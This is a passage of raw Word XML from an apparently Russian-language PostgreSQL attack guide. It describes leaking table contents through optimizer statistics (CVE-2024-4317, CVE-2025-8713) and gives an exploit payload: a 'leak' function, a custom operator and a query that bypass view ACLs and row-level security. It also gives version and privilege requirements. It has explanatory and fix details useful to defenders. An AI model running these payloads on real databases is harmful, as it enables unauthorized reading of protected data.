          <w:bCs/>
        </w:rPr>
        <w:t>16 ≤ 16.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17 ≤ 17.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Не зависит от R17, отдельная цепочка. Принцип: атакующий создаёт custom operator/function, использует его в WHERE против view (с ACL-фильтром) или RLS-таблицы, planner вызывает функцию для оценки selectivity и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>передаёт ей сырые значения из pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до применения ACL/RLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C6AD73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Концептуальный payload (требует CREATE FUNCTION в схеме атакующего, недоступен из чистой SQLi без 3.13):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F8DFC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- На стороне атакующего: подготовка собственной функции-collector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EADCEAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION public.leak(anyelement) RETURNS bool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDEA693" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A94C89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA1CA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RAISE NOTICE 'leaked: %', $1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295925CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C1717" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DEC397" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0269D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OPERATOR public.&lt;&lt;&lt;&lt; (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A281B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  PROCEDURE = public.leak,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03564C6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  LEFTARG = anyelement, RIGHTARG = anyelement,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BEC55F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RESTRICT = scalarltsel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A683D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1C76AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01545C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Использование на ограниченном view (или RLS-таблице):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E5053" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT count(*) FROM restricted_view WHERE protected_col &lt;&lt;&lt;&lt; 'anything';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192C4038" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Когда planner оценивает selectivity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>restricted_view.protected_col &lt;&lt;&lt;&lt; 'anything'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, он вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scalarltsel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (стандартная функция оценки селективности) — а внутри неё происходит обращение к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic.stavaluesN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> underlying таблицы. До патча selectivity-оценщики не валидировали, что текущая роль имеет право видеть эти значения — функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.leak(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вызывалась с реальными values из MCV underlying-таблицы, минуя view-ACL и RLS-политики.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8636F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>В контексте SQLi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload требует, чтобы атакующий уже мог выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OPERATOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (требует CREATE на схеме). Это значит, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сам по себе из чистой SELECT-инъекции R26 не эксплуатируется</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нужна пара 3.13 (получить CREATE) → 3.8.6 Payload C. На managed-провайдерах, где application-роль обычно имеет CREATE на public, цепочка часто закрывается одним шагом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB70EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернативная форма R26 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>существующий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> custom operator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кастомные через pg_trgm и т.п.). Если в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_operator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уже есть operator от расширения, атакующий может его использовать без CREATE. Список доступных через 3.8.4 Payload C (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027A7D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Детальный разбор R26 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (Хронология 2025)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D9222" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Утечка фрагментов содержимого таблиц через optimizer statistics в трёх формах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBBE557" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Top-N значений (MCV)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для колонок с низкой/средней кардинальностью реально равно «список существующих значений». Особенно опасно для: enum-подобных колонок (статусы, типы, флаги), которые часто описывают бизнес-логику; колонок с малым словарём (страны, языки, email-домены, префиксы токенов); колонок с deduplicated данными (boolean-флаги, NULL/значение).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F59FCEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Гистограмма (histogram_bounds)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — квантили: для timestamp-колонок даёт диапазон дат активности; для numeric — диапазон цен/балансов; для id — диапазон существующих идентификаторов. Не leak уникальных значений, но даёт картину распределения, по которой подбор векторов становится точнее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4893B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n_distinct и null_frac</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — количество уникальных значений (приблизительно) и доля NULL. Само по себе не утечка значений, но сигнализирует, на какие колонки имеет смысл идти за полной выборкой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D56E2B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>На непатченных версиях (R17/R26)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же самое, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без необходимости иметь SELECT на колонку</w:t>
      </w:r>
      <w:r>
        <w:t>: обход ACL и RLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09445229" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Чувствительные данные через MCV-канал утекают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>массово</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, если разработчик нарушил best practice — например, хранил пароли в plain text (рара ныне, но встречается в legacy и в test-данных, которые иногда попадают в production-кластеры). MCV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password = {123456, password, qwerty, letmein, ...}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это сразу top-10 паролей в кластере без перебора hash-ей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D10B40E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D849AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_statistic_ext_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — реальные таблицы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SELECT на них REVOKE от PUBLIC, оставлен только superuser. Это сделано осознанно, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stavaluesN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит сырые значения колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188ECAAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — views поверх них с WHERE-фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>has_column_privilege(...)</w:t>
      </w:r>
      <w:r>
        <w:t>. Идея: показать роли статистику только тех колонок, на которые она имеет SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39018F4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-4317 (R17):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фильтр был реализован только частично — для одних колонок view, но не для других (включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Атакующий читает все строки view, для запрещённых колонок получает данные. Фикс — пересоздание view с правильным фильтром в каждой колонке. Делается через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отдельный SQL-скрипт `fix-CVE-2024-4317.sql`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (поставляется с патчем); сам по себе бинар-апгрейд view не трогает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3A258" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2025-8713 (R26):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> selectivity-оценщики (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scalarltsel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eqsel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и т.п.) при оценке custom operator получали значения из MCV underlying-таблицы и передавали их в pluggable-функцию custom operator-а. До патча эти значения не валидировались на права. Фикс — selectivity-оценщики теперь проверяют права роли на колонку перед передачей MCV в custom function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7B8E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`has_column_privilege(role, table, column, 'SELECT')`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный механизм PG для per-column ACL. В обоих CVE регрессия — view забывал вызвать эту функцию или вызывал её для не тех колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC37FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C3A0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> см. каждый payload отдельно. Payload A работает везде. Payload B — до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t>. Payload C — до фиксов 17.6/16.10/15.14/14.19/13.22 (август 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282BE276" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются для A/B. Payload C удобнее с pg_trgm или другим расширением, дающим custom operator, иначе нужен CREATE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B8556" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
